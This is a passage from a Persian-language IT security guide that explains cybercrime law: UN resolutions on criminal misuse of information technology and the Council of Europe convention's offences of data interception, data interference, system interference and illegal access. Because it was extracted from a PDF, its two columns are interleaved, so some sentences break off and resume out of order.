‫ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺍﺳﺖ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ‬
‫ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺨـﺶ‬
‫ﺧــﺼﻮﺻﻲ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ "ﻗــﺎﻧﻮﻥ ﺟــﺮﺍﺋﻢ" ﺍﺳــﺖ‪ .‬ﻣﺆﺳــﺴﺎﺕ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻣﻨﻄﻘﻪﺍﻱ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﻫﺮ ﻛـﺸﻮﺭ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺑﺨﺸﻲ ﺍﺯ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﻬﺒﻮﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬
‫ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﺨﻠﻔﺎﺗﻲ ﻛﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ‪ ،‬ﻳـﺎ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﻣﺨﺪﻭﺵ ﻣـﻲﻛﻨﻨـﺪ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﺧـﻮﺩ ﺭﺍ‬
‫‪Information Sharing and Analysis Center‬‬
‫‪Warning, Advice & Reporting Point‬‬
‫‪National Security Telecommunication‬‬
‫‪Advisory Committee‬‬
‫‪75‬‬
‫‪76‬‬
‫‪77‬‬
‫‪٢٤٧‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﻳﺪ‪ .‬ﭼﺎﺭﭼﻮﺏ ﺍﺟﺮﺍﻳﻲ ﻗﺎﻧﻮﻥ ﺟﺮﺍﺋﻢ ﻣﺘﺸﻜﻞ ﺍﺯ ﻗﻮﺍﻧﻴﻦ‬
‫ﻣﻮﺿﻮﻋﻪ‪ ٧٨‬ﻭ ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨـﺪ‪ ٧٩‬ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﺣـﺮﻳﻢ‬
‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﻛﻪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺣﺬﻑ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻳﺎ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﻭ ﺑﺎﻋﺚ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷـﻮﻧﺪ‪ ،‬ﻳـﺎ ﺑـﻪ ﻳـﻚ‬
‫ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﻧﻔــﻮﺫ ﻛــﺮﺩﻩ ﻭ ﺷــﻜﻞ ﻇــﺎﻫﺮﻱ ﺁﻥ ﺭﺍ ﺗﻐﻴﻴــﺮ‬
‫ﻣﻲ ﺩﻫﻨﺪ‪ ،‬ﻫﻤﻪ ﺟـﺰﺀ ﺍﻳـﻦ ﺩﺳـﺘﻪ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﻧﺪ‪.‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻋﻨﺼﺮ "ﻗـﺼﺪ" ﺑـﺮﺍﻱ ﺗﻤـﺎﻳﺰ ﻣﻴـﺎﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﻭ ﺻﺮﻓﹰﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻌﻤﻮﻝ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﺗﺼﺎﺩﻓﻲ‬
‫ﻭﻳﺮﻭﺳﻬﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺧﺼﻮﺻﻲ ﻛﻪ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻛﺎﺭﺑﺮﺩ ﺍﺧﺘـﺼﺎﺻﻲ ﺩﺍﺭﺩ ﻭ‬
‫ﻧﻴﺰ ﺍﺯ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻴﺪﺍﻧﻲ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺷﺎﻳﺪ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﺑﺎﺷـﺪ‬
‫ﻛﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﻣﺠﻤـﻊ‬
‫ﻋﻤــﻮﻣﻲ ﺳــﺎﺯﻣﺎﻥ ﻣﻠــﻞ ﺩﺭ ﺩﺳــﺎﻣﺒﺮ ‪ ۲۰۰۰‬ﻭ ﮊﺍﻧﻮﻳــﻪ ‪۲۰۰۲‬‬
‫ﻗﻄﻌﻨﺎﻣــﻪﻫــﺎﻱ ‪ ۵۵/۶۳‬ﻭ ‪ ۵۶/۱۲۱‬ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﻣﺒــﺎﺭﺯﻩ ﺑــﺎ‬
‫ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﺑـﻪ ﺗـﺼﻮﻳﺐ‬
‫ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﺑﻴﺎﻥ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ‬
‫ﺍﺯ ﺑﻴﻦ ﺑـﺮﺩﻥ ﭘﻨﺎﻫﮕـﺎﻩ ﺍﻣـﻦ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻴﻜﻪ ﻣﺮﺗﻜـﺐ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺗﺪﻭﻳﻦ ﻛﻨﻨﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺍﻳﻦ ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﻋﻨﻮﺍﻥ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﺟﻬـﺖ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺒـﺎﺩﻝ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ(‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﻻﺯﻡ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ .‬ﭘﻴـﺸﻨﻬﺎﺩ ﻗﻄﻌﻨﺎﻣـﺔ ‪ ۵۵/۶۳‬ﻧﻴـﺰ‬
‫ﺁﻣﻮﺯﺵ ﻗﻮﺍﻧﻴﻦ ﺍﺟﺮﺍﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ‪.‬‬
‫ﺳﺮﭘﻴﭽﻲ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿﻮﻋﺔ ﺟﺮﺍﺋﻢ‬
‫•‬
‫ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫﺎ‪ :٨٠‬ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺗﻌﻤـﺪﻱ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ ﺍﺯ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺷـﺨﺎﺹ ﺍﺷـﺎﺭﻩ‬
‫ﻛــﺮﺩ‪ .‬ﺍﻳــﻦ ﻗــﻮﺍﻧﻴﻦ ﺑــﻪ ﻗــﺼﺪ ﺣﻔﺎﻇــﺖ ﺍﺯ ﻣﺤﺮﻣــﺎﻧﮕﻲ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻬﻴﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻈﺎﻣﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺩﻧﻴﺎ‪ ،‬ﺭﺩﻳـﺎﺑﻲ‬
‫ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﻣﻜﺎﻟﻤﺎﺕ ﺗﻠﻔﻨﻲ ﺭﺍ ﺟـﺮﻡ ﻣـﻲ ﺩﺍﻧﻨـﺪ؛ ﻭ ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮ ﹺﻡ ﺧﻮﺵﺗﻌﺮﻳﻒ ﺩﺭ ﺟﻬﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲ ﺗﻮﺍﻧـﺪ‬
‫ﻛﺎﺭﻛﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺗﺪﺍﺧﻞ ﺩﺍﺩﻩﻫﺎ‪ :٨١‬ﺗﺨﺮﻳـﺐ‪ ،‬ﺣـﺬﻑ‪ ،‬ﻳـﺎ ﺗﻐﻴﻴـﺮ ﺗﻌﻤـﺪﻱ ﻭ‬
‫ﻼ ﺍﺭﺳــﺎﻝ‬
‫ﻏﻴﺮﻣﺠــﺎﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﺭﺍﻳﺎﻧــﺔ ﺩﻳﮕــﺮﺍﻥ‪ .‬ﻣــﺜ ﹰ‬
‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ :٨٣‬ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﻪ‬
‫ﺳﻴــﺴﺘﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺷﺨــﺼﻲ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻣﺘﺮﺍﺩﻑ "ﺗﻌﺪﻱ" ﺩﺍﻧﺴﺖ‪) .‬ﺍﺯ ﻳﻚ‬
‫ﺩﻳﺪﮔﺎﻩ ﺩﻳﮕﺮ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ‬
‫ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺗﻬﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ‬
‫ﺍﺳﺖ(‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺗﻌﺮﻳـﻒ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺤﺮﻣﺎﻧــﻪ )ﻣﺜــﻞ ﺍﻃﻼﻋــﺎﺕ ﭘﺰﺷــﻜﻲ ﻳــﺎ ﻣــﺎﻟﻲ( ﺩﺭﻳﺎﻓــﺖ‪،‬‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﻳﻚ ﻣﻌﺎﻫﺪﻩ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻨﺘﺸﺮ ﻛـﺮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺪﻫﺎﻱ ‪ ۲‬ﺗﺎ ‪ ۵‬ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺨﻠﻔـﺎﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﭼﻬﺎﺭ ﻣﻮﺭﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺟﺮﺍﺋﻢ ﺍﺳﺎﺳـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻧﺎﻡ ﻣﻲﺑﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺧـﻮﺩ ﻣﻌﺎﻫـﺪﻩ ﺑﻄـﻮﺭ‬
‫ﻣﻔﺼﻞ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺭﺍ‬
‫ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﺍﺭﺍﻱ ﮔﺰﺍﺭﺷﻲ ﺗﻮﺻﻴﻔﻲ ﺍﺳﺖ ﻛﻪ ﺑـﻪ‬
‫ﺗﻌﺒﻴﺮ ﺁﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻨﺪ ‪ ۲‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﺑﻪ ﻣﻘﺎﺑﻠـﻪ‬
‫ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ )ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺗﻤـﺎﻡ ﻳـﺎ ﺑﺨـﺸﻲ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ( ﻓﺮﺍ ﻣﻲﺧﻮﺍﻧﺪ‪ .‬ﺩﺭ ﻇﺎﻫﺮ‪ ،‬ﺍﻳﻦ ﻣﺎﺩﻩ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛـﻪ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺭﺳﺎﻝ ﻣﻲ ﻧﻤﺎﻳﻨﺪ ﻣﺠﺮﻡ ﻣﻲ ﺷـﻤﺎﺭﺩ‪،‬‬
‫‪78 Substantive Law‬‬
‫‪79 Procedural Law‬‬
‫‪Data Interception‬‬
‫‪Data Interference‬‬
‫‪80‬‬
‫‪81‬‬
‫‪System Interference‬‬
‫‪Illegal Access‬‬
‫‪82‬‬
‫‪83‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﻣﺘـﺼﻮﺭ‬
‫ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻧﻴـﺰ ﻧﺎﻣﻬـﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ‬
‫ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﻣﺠﻤــﻮﻉ‪ ،‬ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺴﺘﻨﺪ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺩﺳﺘﺔ ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪:‬‬
‫•‬
‫ﺗﺪﺍﺧﻞ ﺳﻴﺴﺘﻢ‪ :٨٢‬ﺟﻠﻮﮔﻴﺮﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺳﻴـﺴﺘﻢ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺼﻮﺭﺕ ﺗﻌﻤــﺪﻱ ﺍﺯ ﻃﺮﻳــﻖ ﻭﺭﻭﺩ‪ ،‬ﺍﻧﺘﻘــﺎﻝ‪،‬‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﺣﺬﻑ‪ ،‬ﻳﺎ ﺗﻐﻴﻴـﺮ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ .‬ﺍﻳـﻦ ﺑﻨـﺪ‬
‫ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺍﺯ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻳﺎ ﻭﺭﻭﺩ‬
‫ﻭﻳﺮﻭﺱ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛـﺎﺭﻛﺮﺩ ﻃﺒﻴﻌـﻲ‬
‫ﺁﻥ ﺗﺪﺍﺧﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺷﻮﺩ‪" .‬ﺁﺳﻴﺐ ﺟﺪﻱ" ﻋﻨـﺼﺮﻱ‬
‫ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺭﺍ ﺍﺯ ﺭﻓﺘﺎﺭﻫـﺎﻱ ﻣﻌﻤـﻮﻟﻲ‬
‫ﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺜﻞ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﻧﺎﺧﻮﺍﺳﺘﻪ ﻣﺠﺰﺍ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٨‬‬
‫ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ‪ ،‬ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ‬
‫ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ‬
‫ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ‪ ،٨٤‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪cookie‬ﻫـﺎ ﻳـﺎ‬
‫‪bot‬ﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﺟﺮﺍﺋﻢ ﺗﺴﻬﻴﻞﺷﺪﻩ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ‬
‫ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻪﺗﻨﻬﺎ ﺷﺎﻣﻞ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩ ﻣﺘﺨﻠـﻒ‬
‫ﺑﺮ ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ ،‬ﺑﻠﻜﻪ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑـﺮ ﻣـﻲﮔﻴـﺮﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫ﺳﺮﻗﺖ ﻭ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺟﺮﺍﺋﻤﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺗﻤﺎﻣﻲ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺍﻣــﺎ ﺳــﺮﻗﺖ ﻭ ﻛﻼﻫﺒــﺮﺩﺍﺭﻱ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﺻــﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺗﺨﻠﻔﺎﺗﻲ ﻫﻤﭽﻮﻥ ﺳﺮﻗﺘﻬﺎﻱ ﺍﺩﺑـﻲ ﻭ‬
‫ﻓﻜﺮﻱ ﻳﺎ ﺍﻧﺘﺸﺎﺭ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺑﻪ ﺟﺮﺍﺋﻢ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻤﻲﺷﻮﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺗﺨﻠﻔﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ‪ ،‬ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﺟـﺮﺍﺋﻢ‬
‫ﻣﻮﺟﻮﺩ‪ ،‬ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺗﺤﻠﻴـﻞ ﺩﻗﻴـﻖ‬
‫ﻋﻮﺍﻣﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻨﮕﻮﻧﻪ ﺟﺮﺍﺋﻢ ﻣﺴﺘﻠﺰﻡ ﺑﺮﺭﺳﻲ ﺗﻄﺒﻴﻘﻲ ﻗـﻮﺍﻧﻴﻦ‬
